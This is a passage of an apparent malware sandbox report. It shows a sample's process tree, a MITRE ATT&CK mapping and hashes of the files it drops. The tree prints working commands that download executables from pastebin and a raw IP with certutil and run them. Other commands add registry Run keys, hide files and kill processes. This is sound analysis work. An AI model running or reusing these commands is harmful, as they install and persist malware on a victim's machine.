      certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
      4⤵
      PID:1480
  - - C:\Windows\system32\find.exe
      find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
      4⤵
      PID:4036
  - - C:\Windows\system32\cmd.exe
      cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
      4⤵
      PID:2672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='Microsoft.exe' delete
      4⤵
      PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='winupdate.exe' delete
      4⤵
      PID:1788
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
      4⤵
      Adds Run key to start application
      PID:2396
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
      4⤵
      Adds Run key to start application
      PID:5028
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
      4⤵
      Views/modifies file attributes
      PID:4000
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
      4⤵
      Views/modifies file attributes
      PID:4020
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
      4⤵
      Drops startup file
      Views/modifies file attributes
      PID:5108
  - - C:\Windows\system32\xcopy.exe
      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
      4⤵
      PID:3772
  - - C:\Windows\system32\xcopy.exe
      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
      4⤵
      Drops startup file
      PID:4240
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3496
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
      4⤵
      PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
      4⤵
      PID:3664
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Windows (x86)\*.*"
      4⤵
      Views/modifies file attributes
      PID:2980
  - - C:\Windows\system32\certutil.exe
      certutil -urlcache -split -f "http://52.77.214.77:8083/xm/win.com" "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
      4⤵
      PID:2852
  - - C:\Windows\system32\certutil.exe
      certutil -urlcache -split -f "http://52.77.214.77:8083/xm/64a1.com" "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
      4⤵
      PID:4936
  - - C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
      "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies registry class
      PID:2832
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\aarun.vbs"
        5⤵
        Checks computer location settings
        
        PID:4920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Windows (x86)\xagal.bat" "
        6⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        7⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:4732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
        7⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic csproduct get UUID /format:list
        8⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\find.exe
        
        find "="
        8⤵
        
        PID:3444
        
        C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        7⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c del "C:\Windows (x86)\xagal.bat"
        7⤵
        
        PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\updateW\win.com
      "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
      4⤵
      Executes dropped EXE
      PID:3188
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 5
      4⤵
      Runs ping.exe
      PID:3728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
      4⤵
      PID:3860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
      4⤵
      PID:2712
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Windows (x86)\*.*"
      4⤵
      Views/modifies file attributes
      PID:2428
  - - C:\Windows (x86)\explorer.exe
      "C:\Windows (x86)\explorer.exe"
      4⤵
      PID:1468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FE3B.tmp\FE3C.bat

Filesize
13KB

MD5
b8d37d42c7b70fb63c19f741c3a23d63

SHA1
62c43ac9efa8f3abb6a3a1f529076ef5d3ae37d9

SHA256
6822b2a4a79cf09c86263d7464abc7ccf375dd37ba5ff5503f3c4f1c9fad8188

SHA512
800bc7db00e77a6f563a9f036c45b3a91eb07831080903da043c00cd5d76cd0528a79458365f4077020830515a3b23689e751e9bed940738c3221a93f491d19e

Download Submit
C:\Users\Admin\AppData\Local\Temp\VERIU.BAT

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe

Filesize
63KB

MD5
a5b1e5ca923df2568e09456390ff0ad8

SHA1
03b39ecd7d246a521fafd210d6be548fd1d337fd

SHA256
2246f52abfa3e125b7eb5831b40130fb1d4b6b2a274fef9b3b7aa854487b70a3

SHA512
7c286de35fd8899a2a43791e8a50436362a12f78b2582dcb72c75470a7ea50e3788d8ce4846de825501e929cf9a2e4ece4cd5d75f2627cd6ccf78cd91c2a885c

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\d709369490a2544d620ba0df857dadd0bb0d791c.key

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Windows (x86)\1xs.txt

Filesize
1KB

MD5
4bef77593548c8ffbe1032d1e19fdbe1

SHA1
396ed9957651cd175dfe1a07274fcf97b8498c7b

SHA256
19c089eef95773db053e4296baa918ed3a4e98fed7ec96ea5dd796bf95b5f4c6

SHA512
661769875578c3e498b526f0541b6ab4f52d87b49e0b0688ac65b3c44f2bdf929bf810c0187c8cc39ab9a004d3e985dc0120f12c07e8cd646beedba93ea93546

Download Submit
C:\Windows (x86)\3xs.txt

Filesize
938B

MD5
d80386f87dd89d45b52e57309bb3d967

SHA1
4b5df6a75c30a66d153b021518383d9e78d85c96

SHA256
0cb8999b0ac329d2f18a50a25344c8075f7e2eb472292f04bc099afef90166aa

SHA512
7fe22bc10555f6db611248418d04d47805970f04bddc05f6e40ab98a02b6f238292cf746ca1b48f575d5c511e5adaece68110d167bccc91aadda41772fe80096

Download Submit
C:\Windows (x86)\AppxProvisioning.xml

Filesize
2KB

MD5
85acfc76e1be21cd8602f85d1cf845ba

SHA1
f5507f6cf6e9b03ca06a69fffafede91d2799ef0

SHA256
29b4fc2e6b4814d13cea16ed9114e6cb764a1e92dbc1ed49ef834168b1e9cfb4

SHA512
e6c8b19d798c04ebfac501ed55bd5218f59e3780501ec200196f81d6f3d8069d1a43f3629932683c531dd3977b44e1a5e3f7c8e793b92c0797d4810150b4d068

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-black.png

Filesize
8KB

MD5
705628497c0012302212a46add463e6e

SHA1
c1b0e1ed262832698d695d6893408f271a3832f1

SHA256
a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

SHA512
0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-high.png

Filesize
8KB

MD5
f63c615733a3337bf2bea96c6ee9b568

SHA1
9c6122515da1d630ca04a303c4c296be6a696e14

SHA256
b0fda245579e57a9c613e1288c6b294c907a3b8e5bee32a72437a4fbfabc061c

SHA512
76c024e3a2bee36d308db5a71e5cd30410b25cdb55412d9ffe68f6c2ed83a6553ee9dca53e8996631b42b48b3ffd12470658e9645ec6a2270711cbb15561f897

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-white.png

Filesize
8KB

MD5
705628497c0012302212a46add463e6e

SHA1
c1b0e1ed262832698d695d6893408f271a3832f1

SHA256
a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

SHA512
0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.png

Filesize
8KB

MD5
daf1dcb4aee839a1965f4cc160c49a53

SHA1
5830048cd318d13c2841998082c97fb579040904

SHA256
91d33ec5f008f2066b3a6658e1915b09a4fea2ed70e5260a0bd37c618c219fc1

SHA512
9b2af035dcf877eaca4ea5da053417fd8840d79abcff53e607bbd48f21cda85ae004f94325da44266653d23a255e85675100a41521b840c7bf282dde48bbd23e

Download Submit
C:\Windows (x86)\DMAppsRes.dll

Filesize
2KB

MD5
373e36f2470ad6dd714bee7ce7406c03

SHA1
6f99d517470ad94c709b43d11a7182b4e28b0c47

SHA256
04ba799641106d47e995283c3b1d1196b1837025fafadafe4b983ecb98a089af

SHA512
82b0802423a1486c6dd77714ae468fe8327de39c6402c1927dddfca632ab7d27e2f65714fa25780cd51b528deaa38bf956b778a1b9e0e3adeab622a29c0ec725

Download Submit
C:\Windows (x86)\DetailedReading-Default.xml

Filesize
3KB

MD5
4a6fa3c0efd237f104e09a22883d9388

SHA1
4fb30a39a11ef1115159b8585efeab4fc9ddaa91

SHA256
a75bcfa83c8e80720624646486daec8c1835fef2fef868b93e02a4c489287c7c

SHA512
489a0b94a34aa7068741a77c7f78319d582ed7ad15b077727b3c1af501056d67f12ba47007f78f07868690b83d10815ed5c83f641dc8c87ad99cb2fa1794df6d

Download Submit
C:\Windows (x86)\FXSEVENT.dll

Filesize
8KB

MD5
306720d1bca22b93968b34459f047490

SHA1
0d84c6dfee0c079f809f8ff82f56ac3a0ca275e9

SHA256
2c010212274dce9fcfad0d17962577d5639cfdff3f4b875e3ed510de665cd171

SHA512
dd69c3ca2e7e271f9fdd57bffb1893c679768669e44f26a69f2ea7640738c7b97eec6d8c7749f180ce59d3d248a6c4c921b6168b536aa5b89701ebc73c1a010d

Download Submit
C:\Windows (x86)\Firewall.cpl

Filesize
7KB

MD5
afd33f68fb822fb66861903ded9fb1c5

SHA1
1dd41a8f4ced7a6e49c79005ce634280adb5d207

SHA256
a6a1c633c9bd4864349fe2b5939dcda0ad6e0d74679edfe6c0b19449c4efa3e7

SHA512
c82f1a3f84fa689ff68c4db3eb431f711d054d74179483e7802cc119b86b95b8ddc3dd3ff374a513cb6017725eaa1d4adecbc1edb84989c9e4e8f581c4ef6012

Download Submit
C:\Windows (x86)\KBDA1.DLL

Filesize
7KB

MD5
126d1f1a32a2f8bb07231a99cbf131d3

SHA1
c8330fac20637903721e5a33aa34cbf5f2405445

SHA256
7eee7b34c956cd7317c2f2e4399b176794592445008c0c9f8fc8405a47cdb28d

SHA512
23e117d338d55e48be3f2852d1be3a59353469ce9f841540449e6a7f142a18684de90396de5199257d2cc16c6732ff12c52709bdbd812fbdfb3741e4c119b7be

Download Submit
C:\Windows (x86)\KBDA2.DLL

Filesize
7KB

MD5
685252776cbb41672148ac5adb42c2de

SHA1
3c3a95734012f797ff5a824ef71d017b6381e99d

SHA256
0c281c4c948fd83168d4306fc0c9f004b1fa4cdb685add54fa980a387a47ba8f

SHA512
d447af8aff5e2b3e6eb1de2520ddc2f3473f091bf520509514efd55eb2cb9ba82f989c586a3fef8170bd56c310605a28ce343249efe3661cf8bec67b96b4c38e

Download Submit
C:\Windows (x86)\KBDA3.DLL

Filesize
7KB

MD5
ec056ed6d4e7661846d88e4ef43c40de

SHA1
45e29fdf4d29f9ba4a5d54c1ccce4845f9b11e05

SHA256
1bbc7795e9d57fe725b1f3a9cd8f06705716749a56efa8070ce087f34bf8ffe1

SHA512
5fe574ba69a5bc1264edea9738e4c3cbbc7d282ac5b2fd2a980edfa30740410b73a1053b6977b58523891343fda8264f96023b35e1c45b8f06d274cceb3aef5c

Download Submit
C:\Windows (x86)\KBDAL.DLL

Filesize
8KB

MD5
b2e662d9dd078f134e62a806a009b51c

SHA1
dfa09a62eb32086c9b6a60b24d65deecf4349bee

SHA256
9e4d23d3fd9724872eb9cd5842724dff791a0dd29d54007d48d86a9e23fd192f

SHA512
51f897d5522dd8862625ad7c8012eb0781c4e61236cdb3d16c1dd26f067e171114fe63dbf4c1c6b3287fcf918d3af485bd50896d1513153b9c7f464ca7b97fd3

Download Submit
C:\Windows (x86)\KBDARME.DLL

Filesize
7KB

MD5
7e3a6ef1f5cce4b605764a985bf57106

SHA1
2770ec7b2ae93e3f137973c1d90c491f5ad8bb1f

SHA256
fab36c88bdd4b9621b684df6dedcb0815ee2d9bc3f127d93485cc85f1218dda2

SHA512
4e86d6ba1a9352aa165086e03c321222f0f0fcce01a5778a1c9b3371db15d2aa81869ce65e4e7df1073e10622eb4f44af6b21b8fadcf5bbe1220a42b97686c22

Download Submit
C:\Windows (x86)\aarun.vbs

Filesize
115B

MD5
29a3502c721319b896b4cf7aae0aaec5

SHA1
de94cfb0214c0deddfbea191598bac33dce53bb9

SHA256
a84a10c5ca727e766a5c25cf6f6f42b3dc3fd8760a5c8a755b77e1404c84b7a0

SHA512
7e791091dac79af2feb151e077ed5e991faec214ff6f857afbf882e2664fc26f044e49b218b422459e7319b1d899ad397be5b8ab9f0d036765a48cf461560cc8

Download Submit
C:\Windows (x86)\advapi32res.dll

Filesize
2KB

MD5
1ba129902c8b7bed03c7cdc7867c736f

SHA1
f2e5105d7a458aabeeb89df8c3bec343473bde99

SHA256
0e038b89882758458f234481adae1a67fb18c3255d963b1d9c969d0d395b44cb

SHA512
d712189b1a2a54117ef062215a4db0edd306cf049f62666837fd527442060141c9d729bb5f616f1f43f5807bcdb6e5d4e946a4ad4a73c3d9dbb767013f12bd3d

Download Submit
C:\Windows (x86)\asferror.dll

Filesize
2KB

MD5
7adeccbc25fc6c44822d1a3ca03d3bd9

SHA1
97d42ff16c83a0802fdfe35d4c2342ba31c532c7

SHA256
03475a7d63f2f2a09d74b6406890d40eb64432dcdc032d55b34f15abb5ca47d3

SHA512
e1442c1fe9f3ceaedaca3f889ac20aa83e40147c3cb62314871f9e90de484949531fd53920093ab7451d28a01ce5d45c612b5a5b075ef7592803da798073f6d9

Download Submit
C:\Windows (x86)\blbres.dll

Filesize
2KB

MD5
e51330dff5b6d09076abcae74bdab37b

SHA1
9827b8ec15c7aa06341763a388ab11479412fc36

SHA256
d386c4ad3223859578018d8012775021e315d2708f3d220106171d6836e6f4ad

SHA512
3eb9813c45f4fa0bda9a1bdf07456e9624679b101a0fcb47d5d37c23ffaf5f93afee2fa513f40c4aaedb7962811520e1b6fc0b994117378cb39d33480d909e68

Download Submit
C:\Windows (x86)\bootstr.dll

Filesize
3KB

MD5
5c92bc8ae13ec449ca223e229bc86fdc

SHA1
2dbe40b89946f369634666fd105f94d2eea90d2c

SHA256
69c7f82badbd72ac5460bbc8f3f33aefb705e45591fc51a47a8264b616c8dd0b

SHA512
200a715824f77c642d7318c87ed9a5d80ccf802cf02556ab4e6c908e24b31de966e7d3ab57ab0a8c8a2043007252cee3a3a9851a3964da6b994ffcfc7008a788

Download Submit
C:\Windows (x86)\bridgeres.dll

Filesize
2KB

MD5
557ec7fe5ddb6b0e2b88ec4706cb394a

SHA1
4288db3c285c6abe08011c9ec5c432795753e43b

SHA256
12f1cbbae3f347c9ac1fd9229eab1658f86f5fd3f3e8438c46b69cd0c68feee1

SHA512
ea7936e56f6de188d8b35ed4cfedbae34d4e6cb5161eadb5234bbb4bae6c3bc946b111f9cef595c3e73e1f18b1e89c5a598407426766f3d3c30c9b3106be398e

Download Submit
C:\Windows (x86)\defragres.dll

Filesize
4KB

MD5
a8e3e8608e47101445aee826fee3f611

SHA1
197258ae69a536dc0f015779bde233a3e4d49859

SHA256
8c5af3b03fcc11bf17ded481bddbdfc0811077c7391b0d4ba616cc2ead47e80c

SHA512
fbcfce2b040762de747da96460d6c648616054a8a004cb385cbf179981321339b254fa282fab171925f63ab4f9ef86724c595635db13b22521bfcbef8f9cc555

Download Submit
C:\Windows (x86)\dmdskres2.dll

Filesize
2KB

MD5
00adb63b901732cb6ebcdb3b9d404945

SHA1
946088b565459987b96427e590fceb078a3a9688

SHA256
e8a7eee20b9de1d981334011ac5550c44fb98a189a4ea24a6660c3efb314b51d

SHA512
ada58be64f7cab2fcca27e753ca9b5f4fd2eec3e6ab705bc66ad33d009819a0e5fd5bda7ccb34151cf23a023c0dd89ce4b3bfb0696ab8135c9fd9002274717a2

Download Submit
C:\Windows (x86)\dxmasf.dll

Filesize
7KB

MD5
db18dedb3b5080ff23cfb17365f8f27a

SHA1
ac2d2cf466cb8314f903599d385cdaa28f6ee2b1

SHA256
7a9ad21e76d3bd95d851752af9bc7e6e46a479994a12d51e8e62040fc06f61dd

SHA512
50e808b04a7d24b4326056cd6088ec1e2485057c2ee2102cf01093a1c8ed20929746d6c6ea19acc7ddb70b8243f46a46cef31dd1e49146db88d869227f4251d5

Download Submit
C:\Windows (x86)\edgehtmlpluginpolicy.bin

Filesize
2KB

MD5
08c33e4ab904ec0960b0781ed26ae039

SHA1
120537ad8aa71fa3f818d940557f0a9ee1049938

SHA256
b2803c9cca7abb72c72269b3ad0608f717574632bfea0cdb7145cdc93b7b3769

SHA512
137d22033fba7f72ef3c8c23771328ff4a3f67ece5f969e22c5f057f794c8d6af00e826f7b06ac10e15fc3600f151da2268f1342123b2f6a1701aedd10b477d3

Download Submit
C:\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
C:\Windows (x86)\f3ahvoas.dll

Filesize
8KB

MD5
bc244c0c43d633372aaa77aeff84c352

SHA1
c547d5d6b1614efde458c67dbb0ccbd5f4877900

SHA256
